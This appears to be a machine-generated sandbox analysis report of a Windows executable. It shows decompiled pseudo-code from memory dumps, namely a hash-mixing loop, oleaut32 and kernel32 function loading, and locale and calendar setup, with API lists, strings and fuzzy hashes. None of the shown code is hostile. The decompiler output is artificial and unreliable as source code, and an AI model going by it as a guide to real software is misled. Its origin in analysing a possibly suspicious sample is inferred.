                                                            						 *_t108 =  *_t108 + (_v8[2] & 0x000000ff) + ((_v8[2] & 0x000000ff) << 8) + ((_v8[2] & 0x000000ff) << 0x10) + ((_v8[2] & 0x000000ff) << 0x18);
                                                            						 *_t96 =  *_t96 -  *_t108;
                                                            						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                            						 *_t108 =  *_t108 +  *_t106;
                                                            						 *_t106 =  *_t106 -  *_t96;
                                                            						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
                                                            						 *_t96 =  *_t96 +  *_t108;
                                                            						 *_t108 =  *_t108 -  *_t106;
                                                            						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
                                                            						 *_t106 =  *_t106 +  *_t96;
                                                            						 *_t96 =  *_t96 -  *_t108;
                                                            						 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
                                                            						 *_t108 =  *_t108 +  *_t106;
                                                            						 *_t106 =  *_t106 -  *_t96;
                                                            						 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
                                                            						 *_t96 =  *_t96 +  *_t108;
                                                            						 *_t108 =  *_t108 -  *_t106;
                                                            						 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
                                                            						 *_t106 =  *_t106 +  *_t96;
                                                            						_t109 = _t109 - 0xc;
                                                            						_v8 =  &(_v8[3]);
                                                            					} while (_t109 > 0xc);
                                                            					goto L20;
                                                            				}
                                                            				if(__edx <= 0xc) {
                                                            					L3:
                                                            					if(_t109 > 0xc) {
                                                            						goto L35;
                                                            					}
                                                            					switch( *((intOrPtr*)(_t109 * 4 +  &M004324DD))) {
                                                            						case 0:
                                                            							return  *_t108;
                                                            						case 1:
                                                            							_v8 =  *_v8;
                                                            							__edx =  *_v8 & 0x000000ff;
                                                            							 *__eax =  *__eax + ( *_v8 & 0x000000ff);
                                                            							goto L35;
                                                            						case 2:
                                                            							_v8 =  *_v8;
                                                            							__edx =  *_v8 & 0x0000ffff;
                                                            							 *__eax =  *__eax + ( *_v8 & 0x0000ffff);
                                                            							goto L35;
                                                            						case 3:
                                                            							_v8 =  *_v8;
                                                            							__edx =  *_v8 & 0x00ffffff;
                                                            							 *__eax =  *__eax + ( *_v8 & 0x00ffffff);
                                                            							goto L35;
                                                            						case 4:
                                                            							_v8 =  *_v8;
                                                            							 *__eax =  *__eax +  *_v8;
                                                            							goto L35;
                                                            						case 5:
                                                            							__edx = _v8;
                                                            							 *__eax =  *__eax +  *__edx;
                                                            							__edx =  *(__edx + 4);
                                                            							 *__ebx =  *__ebx + __edx;
                                                            							goto L35;
                                                            						case 6:
                                                            							__edx = _v8;
                                                            							 *__eax =  *__eax +  *__edx;
                                                            							__edx =  *(__edx + 4);
                                                            							 *__ebx =  *__ebx + __edx;
                                                            							goto L35;
                                                            						case 7:
                                                            							__edx = _v8;
                                                            							 *__eax =  *__eax +  *__edx;
                                                            							__edx =  *(__edx + 4);
                                                            							 *__ebx =  *__ebx + __edx;
                                                            							goto L35;
                                                            						case 8:
                                                            							__edx = _v8;
                                                            							 *__eax =  *__eax +  *__edx;
                                                            							 *__ebx =  *__ebx + __edx;
                                                            							goto L35;
                                                            						case 9:
                                                            							__edx = _v8;
                                                            							 *__eax =  *__eax +  *__edx;
                                                            							 *__ebx =  *__ebx +  *(__edx + 4);
                                                            							__edx =  *(__edx + 8);
                                                            							 *__ecx =  *__ecx + __edx;
                                                            							goto L35;
                                                            						case 0xa:
                                                            							__edx = _v8;
                                                            							 *__eax =  *__eax +  *__edx;
                                                            							 *__ebx =  *__ebx +  *(__edx + 4);
                                                            							__edx =  *(__edx + 8);
                                                            							 *__ecx =  *__ecx + __edx;
                                                            							goto L35;
                                                            						case 0xb:
                                                            							__edx = _v8;
                                                            							 *__eax =  *__eax +  *__edx;
                                                            							 *__ebx =  *__ebx +  *(__edx + 4);
                                                            							__edx =  *(__edx + 8);
                                                            							 *__ecx =  *__ecx + __edx;
                                                            							goto L35;
                                                            						case 0xc:
                                                            							__edx = _v8;
                                                            							 *__eax =  *__eax +  *__edx;
                                                            							 *__ebx =  *__ebx +  *(__edx + 4);
                                                            							 *__ecx =  *__ecx + __edx;
                                                            							goto L35;
                                                            					}
                                                            				} else {
                                                            					goto L2;
                                                            				}
                                                            				do {
                                                            					L2:
                                                            					 *_t96 =  *_t96 +  *_v8;
                                                            					 *_t106 =  *_t106 + _v8[1];
                                                            					 *_t108 =  *_t108 + _v8[2];
                                                            					 *_t96 =  *_t96 -  *_t108;
                                                            					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000004 |  *_t108 >> 0x0000001c);
                                                            					 *_t108 =  *_t108 +  *_t106;
                                                            					 *_t106 =  *_t106 -  *_t96;
                                                            					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000006 |  *_t96 >> 0x0000001a);
                                                            					 *_t96 =  *_t96 +  *_t108;
                                                            					 *_t108 =  *_t108 -  *_t106;
                                                            					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000008 |  *_t106 >> 0x00000018);
                                                            					 *_t106 =  *_t106 +  *_t96;
                                                            					 *_t96 =  *_t96 -  *_t108;
                                                            					 *_t96 =  *_t96 ^ ( *_t108 << 0x00000010 |  *_t108 >> 0x00000010);
                                                            					 *_t108 =  *_t108 +  *_t106;
                                                            					 *_t106 =  *_t106 -  *_t96;
                                                            					 *_t106 =  *_t106 ^ ( *_t96 << 0x00000013 |  *_t96 >> 0x0000000d);
                                                            					 *_t96 =  *_t96 +  *_t108;
                                                            					 *_t108 =  *_t108 -  *_t106;
                                                            					 *_t108 =  *_t108 ^ ( *_t106 << 0x00000004 |  *_t106 >> 0x0000001c);
                                                            					 *_t106 =  *_t106 +  *_t96;
                                                            					_t109 = _t109 - 0xc;
                                                            					_v8 = _v8 + 0xc;
                                                            				} while (_t109 > 0xc);
                                                            				goto L3;
                                                            			}














                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                            • Instruction ID: db30b7f2ad9068286955554028b9aaa685d7675e6c5eb7ed9f8bac599936a457
                                                            • Opcode Fuzzy Hash: 33b0767fec04d2cc36286a41c43eb0d38f805e6e14f2767db37a63931b683382
                                                            • Instruction Fuzzy Hash: 9402E032900235DFDB96CF69C140149B7B6FF8A32472A82D2D854AB229D270BE52DFD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                            • Instruction ID: d9bdd0ffc78bce1da46a164adb44ca0a352dc4e9e15995579375b7a7492e944c
                                                            • Opcode Fuzzy Hash: 3027258f69a45e47f11e6ef411682183d8681a3ba960b00656adada6bea5bd6d
                                                            • Instruction Fuzzy Hash: FB61A7456AE7C66FCB07C33008B81D6AF61AE9325478B53EFC8C58A493D10D281EE363
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                            • Instruction ID: c1f34be03cf0569538104f0038f02cfb84df381903d0011f2ebedd3a3241928c
                                                            • Opcode Fuzzy Hash: 1f1654813ed5821a00b8b7144780f614f73eea8c4dc557e3c0d17b55d1bda45a
                                                            • Instruction Fuzzy Hash: 76C0E9B550D6066E975C8F1AB480815FBE5FAC8324364C22EA01C83644D73154518A64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E00427874() {
                                                            				struct HINSTANCE__* _v8;
                                                            				intOrPtr _t46;
                                                            				void* _t91;
                                                            
                                                            				_v8 = GetModuleHandleW(L"oleaut32.dll");
                                                            				 *0x4c1134 = E00427848("VariantChangeTypeEx", E00427264, _t91);
                                                            				 *0x4c1138 = E00427848("VarNeg", E004272AC, _t91);
                                                            				 *0x4c113c = E00427848("VarNot", E004272AC, _t91);
                                                            				 *0x4c1140 = E00427848("VarAdd", E004272B8, _t91);
                                                            				 *0x4c1144 = E00427848("VarSub", E004272B8, _t91);
                                                            				 *0x4c1148 = E00427848("VarMul", E004272B8, _t91);
                                                            				 *0x4c114c = E00427848("VarDiv", E004272B8, _t91);
                                                            				 *0x4c1150 = E00427848("VarIdiv", E004272B8, _t91);
                                                            				 *0x4c1154 = E00427848("VarMod", E004272B8, _t91);
                                                            				 *0x4c1158 = E00427848("VarAnd", E004272B8, _t91);
                                                            				 *0x4c115c = E00427848("VarOr", E004272B8, _t91);
                                                            				 *0x4c1160 = E00427848("VarXor", E004272B8, _t91);
                                                            				 *0x4c1164 = E00427848("VarCmp", E004272C4, _t91);
                                                            				 *0x4c1168 = E00427848("VarI4FromStr", E004272D0, _t91);
                                                            				 *0x4c116c = E00427848("VarR4FromStr", E0042733C, _t91);
                                                            				 *0x4c1170 = E00427848("VarR8FromStr", E004273AC, _t91);
                                                            				 *0x4c1174 = E00427848("VarDateFromStr", E0042741C, _t91);
                                                            				 *0x4c1178 = E00427848("VarCyFromStr", E0042748C, _t91);
                                                            				 *0x4c117c = E00427848("VarBoolFromStr", E004274FC, _t91);
                                                            				 *0x4c1180 = E00427848("VarBstrFromCy", E0042757C, _t91);
                                                            				 *0x4c1184 = E00427848("VarBstrFromDate", E00427624, _t91);
                                                            				_t46 = E00427848("VarBstrFromBool", E004277B4, _t91);
                                                            				 *0x4c1188 = _t46;
                                                            				return _t46;
                                                            			}







                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(oleaut32.dll), ref: 0042787D
                                                              • Part of subcall function 00427848: GetProcAddress.KERNEL32(00000000), ref: 00427861
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                            • API String ID: 1646373207-1918263038
                                                            • Opcode ID: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                            • Instruction ID: afb448a43cf45882875cbd5333393c9475fd06a837c60371df2c799b3a2ca9d5
                                                            • Opcode Fuzzy Hash: 3edd394f2c42f1ee7728dbbd964d2d48b2f407ea9c7b21d0b846acf91e36c10d
                                                            • Instruction Fuzzy Hash: 4741442078D2689A53007BAA3C0692A7B9CD64A7243E0E07FF5048B766DF7CAC40867D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 82%
                                                            			E0041E7CC(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, long long __fp0) {
                                                            				signed int _v8;
                                                            				char _v12;
                                                            				signed int _v16;
                                                            				intOrPtr _v20;
                                                            				intOrPtr* _t32;
                                                            				signed int _t53;
                                                            				signed int _t56;
                                                            				signed int _t71;
                                                            				signed int _t78;
                                                            				signed int* _t82;
                                                            				signed int _t85;
                                                            				void* _t93;
                                                            				signed int _t94;
                                                            				signed int _t95;
                                                            				signed int _t98;
                                                            				signed int _t99;
                                                            				void* _t105;
                                                            				intOrPtr _t106;
                                                            				signed int _t109;
                                                            				intOrPtr _t116;
                                                            				intOrPtr _t117;
                                                            				void* _t131;
                                                            				void* _t132;
                                                            				signed int _t134;
                                                            				void* _t136;
                                                            				void* _t137;
                                                            				void* _t139;
                                                            				void* _t140;
                                                            				intOrPtr _t141;
                                                            				void* _t142;
                                                            				long long _t161;
                                                            
                                                            				_t161 = __fp0;
                                                            				_t126 = __edi;
                                                            				_t109 = __edx;
                                                            				_t139 = _t140;
                                                            				_t141 = _t140 + 0xfffffff0;
                                                            				_push(__edi);
                                                            				_v12 = 0;
                                                            				_v8 = __edx;
                                                            				_t93 = __eax;
                                                            				_push(_t139);
                                                            				_push(0x41ea61);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t141;
                                                            				_t32 =  *0x4ba590; // 0x4bb8f8
                                                            				_t144 =  *_t32;
                                                            				if( *_t32 == 0) {
                                                            					E0040554C(0x1a);
                                                            				}
                                                            				E00406688(E0040690C( *0x4be7e4, 0, _t126), _t109 | 0xffffffff, _t144);
                                                            				_push(_t139);
                                                            				_push(0x41ea44);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t141;
                                                            				 *0x4be7dc = 0;
                                                            				_push(0);
                                                            				E00409C00();
                                                            				_t142 = _t141 + 4;
                                                            				E0041E034(_t93, 0x41ea7c, 0x100b,  &_v12);
                                                            				_t127 = E0041A1C4(0x41ea7c, 1, _t144);
                                                            				if(_t127 + 0xfffffffd - 3 >= 0) {
                                                            					__eflags = _t127 - 0xffffffffffffffff;
                                                            					if(_t127 - 0xffffffffffffffff < 0) {
                                                            						 *0x4be7dc = 1;
                                                            						_push(1);
                                                            						E00409C00();
                                                            						_t142 = _t142 + 4;
                                                            						E00407E00( *0x4be7e0, L"B.C.");
                                                            						 *((intOrPtr*)( *0x4be7e0 + 4)) = 0;
                                                            						_t71 =  *0x4be7e0;
                                                            						 *((intOrPtr*)(_t71 + 8)) = 0xffc00000;
                                                            						 *((intOrPtr*)(_t71 + 0xc)) = 0xc1dfffff;
                                                            						E0041C1C4(1, 1, 1, __eflags, _t161);
                                                            						_v20 = E00405790();
                                                            						_v16 = 1;
                                                            						asm("fild qword [ebp-0x10]");
                                                            						 *((long long*)( *0x4be7e0 + 0x10)) = _t161;
                                                            						asm("wait");
                                                            						EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
                                                            						_t78 =  *0x4be7e0;
                                                            						__eflags = _t78;
                                                            						if(_t78 != 0) {
                                                            							_t82 = _t78 - 4;
                                                            							__eflags = _t82;
                                                            							_t78 =  *_t82;
                                                            						}
                                                            						_t134 = _t78 - 1;
                                                            						__eflags = _t134;
                                                            						if(_t134 > 0) {
                                                            							_t98 = 1;
                                                            							do {
                                                            								 *((intOrPtr*)( *0x4be7e0 + 4 + (_t98 + _t98 * 2) * 8)) = 0xffffffff;
                                                            								_t98 = _t98 + 1;
                                                            								_t134 = _t134 - 1;
                                                            								__eflags = _t134;
                                                            							} while (_t134 != 0);
                                                            						}
                                                            						EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
                                                            					}
                                                            				} else {
                                                            					EnumCalendarInfoW(E0041E6A4, GetThreadLocale(), _t127, 4);
                                                            					_t85 =  *0x4be7e0;
                                                            					if(_t85 != 0) {
                                                            						_t85 =  *(_t85 - 4);
                                                            					}
                                                            					_t136 = _t85 - 1;
                                                            					if(_t136 >= 0) {
                                                            						_t137 = _t136 + 1;
                                                            						_t99 = 0;
                                                            						do {
                                                            							 *((intOrPtr*)( *0x4be7e0 + 4 + (_t99 + _t99 * 2) * 8)) = 0xffffffff;
                                                            							_t99 = _t99 + 1;
                                                            							_t137 = _t137 - 1;
                                                            						} while (_t137 != 0);
                                                            					}
                                                            					EnumCalendarInfoW(E0041E73C, GetThreadLocale(), _t127, 3);
                                                            				}
                                                            				_t94 =  *0x4be7e0;
                                                            				if(_t94 != 0) {
                                                            					_t94 =  *(_t94 - 4);
                                                            				}
                                                            				_push(_t94);
                                                            				E00409C00();
                                                            				_t53 =  *0x4be7e0;
                                                            				if(_t53 != 0) {
                                                            					_t53 =  *(_t53 - 4);
                                                            				}
                                                            				_t131 = _t53 - 1;
                                                            				if(_t131 >= 0) {
                                                            					_t132 = _t131 + 1;
                                                            					_t95 = 0;
                                                            					do {
                                                            						_t127 = _t95 + _t95 * 2;
                                                            						_t106 =  *0x416e18; // 0x416e1c
                                                            						E00408F5C( *((intOrPtr*)(_v8 + 0xbc)) + (_t95 + _t95 * 2) * 8, _t106,  *0x4be7e0 + (_t95 + _t95 * 2) * 8);
                                                            						_t95 = _t95 + 1;
                                                            						_t132 = _t132 - 1;
                                                            					} while (_t132 != 0);
                                                            				}
                                                            				_t116 =  *0x41e600; // 0x41e604
                                                            				E00409D24(0x4be7e0, _t116);
                                                            				_t56 =  *0x4be7e0;
                                                            				if(_t56 != 0) {
                                                            					_t56 =  *(_t56 - 4);
                                                            				}
                                                            				 *0x4be7dc = _t56;
                                                            				_pop(_t117);
                                                            				_pop(_t105);
                                                            				 *[fs:eax] = _t117;
                                                            				_push(0x41ea4b);
                                                            				return E00406868( *0x4be7e4, _t105, _t127);
                                                            			}

                                                            APIs
                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: CalendarEnumInfoLocaleThread
                                                            • String ID: B.C.$ToA$K$K$K
                                                            • API String ID: 683597275-1724967715
                                                            • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                            • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                            • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                            • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0040A250() {
                                                            				signed int _t2;
                                                            				_Unknown_base(*)()* _t8;
                                                            
                                                            				InitializeCriticalSection(0x4bdc10);
                                                            				 *0x4bdc28 = 0x7f;
                                                            				_t2 = GetVersion() & 0x000000ff;
                                                            				 *0x4bdc0c = _t2 - 6 >= 0;
                                                            				if( *0x4bdc0c != 0) {
                                                            					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
                                                            					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
                                                            					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
                                                            					 *0x4bdc08 = _t8;
                                                            					return _t8;
                                                            				}
                                                            				return _t2;
                                                            			}

                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                            • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                            • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                            • API String ID: 74573329-1403180336
                                                            • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                            • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                            • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                            • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
                                                            			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				char _v16;
                                                            				char _v20;
                                                            				char _v24;
                                                            				char _v28;
                                                            				char _v32;
                                                            				char _v36;
                                                            				char _v40;
                                                            				char _v44;
                                                            				char _v48;
                                                            				char _v52;
                                                            				char _v56;
                                                            				char _v60;
                                                            				int _t55;
                                                            				void* _t121;
                                                            				void* _t128;
                                                            				void* _t151;
                                                            				void* _t152;
                                                            				intOrPtr _t172;
                                                            				intOrPtr _t204;
                                                            				signed short _t212;
                                                            				int _t214;
                                                            				intOrPtr _t216;
                                                            				intOrPtr _t217;
                                                            				void* _t224;
                                                            
                                                            				_t224 = __fp0;
                                                            				_t211 = __edi;
                                                            				_t216 = _t217;
                                                            				_t152 = 7;
                                                            				do {
                                                            					_push(0);
                                                            					_push(0);
                                                            					_t152 = _t152 - 1;
                                                            				} while (_t152 != 0);
                                                            				_push(__edi);
                                                            				_t151 = __edx;
                                                            				_t214 = __eax;
                                                            				_push(_t216);
                                                            				_push(0x41e391);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t217;
                                                            				_t55 = IsValidLocale(__eax, 1);
                                                            				_t219 = _t55;
                                                            				if(_t55 == 0) {
                                                            					_t214 = GetThreadLocale();
                                                            				}
                                                            				_t172 =  *0x416f50; // 0x416f54
                                                            				E00409D24(_t151 + 0xbc, _t172);
                                                            				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
                                                            				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
                                                            				E0041E55C(_t214, _t151, _t151, _t211, _t214);
                                                            				E0041E034(_t214, 0, 0x14,  &_v20);
                                                            				E00407E00(_t151, _v20);
                                                            				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
                                                            				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                            				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
                                                            				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                            				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
                                                            				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
                                                            				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
                                                            				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
                                                            				_t212 = E0041E080(_t214, 0x2f, 0x1d);
                                                            				 *(_t151 + 6) = _t212;
                                                            				_push(_t212);
                                                            				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
                                                            				E00407E00(_t151 + 0xc, _v36);
                                                            				_push( *(_t151 + 6) & 0x0000ffff);
                                                            				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
                                                            				E00407E00(_t151 + 0x10, _v40);
                                                            				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
                                                            				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
                                                            				E00407E00(_t151 + 0x14, _v44);
                                                            				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
                                                            				E00407E00(_t151 + 0x18, _v48);
                                                            				E00407A20( &_v12);
                                                            				E00407A20( &_v16);
                                                            				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
                                                            				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
                                                            				_t220 = _t121;
                                                            				if(_t121 != 0) {
                                                            					E00407E48( &_v8, 0x41e438);
                                                            				} else {
                                                            					E00407E48( &_v8, 0x41e428);
                                                            				}
                                                            				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
                                                            				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
                                                            				_t221 = _t128;
                                                            				if(_t128 == 0) {
                                                            					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
                                                            					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
                                                            						E00407E48( &_v12, L"AMPM ");
                                                            					} else {
                                                            						E00407E48( &_v16, L" AMPM");
                                                            					}
                                                            				}
                                                            				_push(_v12);
                                                            				_push(_v8);
                                                            				_push(":mm");
                                                            				_push(_v16);
                                                            				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
                                                            				_push(_v12);
                                                            				_push(_v8);
                                                            				_push(L":mm:ss");
                                                            				_push(_v16);
                                                            				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
                                                            				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
                                                            				 *((short*)(_t151 + 0xc4)) = 0x32;
                                                            				_pop(_t204);
                                                            				 *[fs:eax] = _t204;
                                                            				_push(0x41e398);
                                                            				return E00407A80( &_v60, 0xe);
                                                            			}






























                                                            APIs
                                                            • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                            • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                              • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                              • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.303422740.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000001.00000002.303416823.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303531170.00000000004B7000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303538178.00000000004C0000.00000004.00020000.sdmp
                                                            • Associated: 00000001.00000002.303544285.00000000004C4000.00000002.00020000.sdmp
                                                            • Associated: 00000001.00000002.303549770.00000000004C6000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID: Locale$Info$ThreadValid
                                                            • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                            • API String ID: 233154393-2808312488
                                                            • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                            • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                            • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                            • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 71%
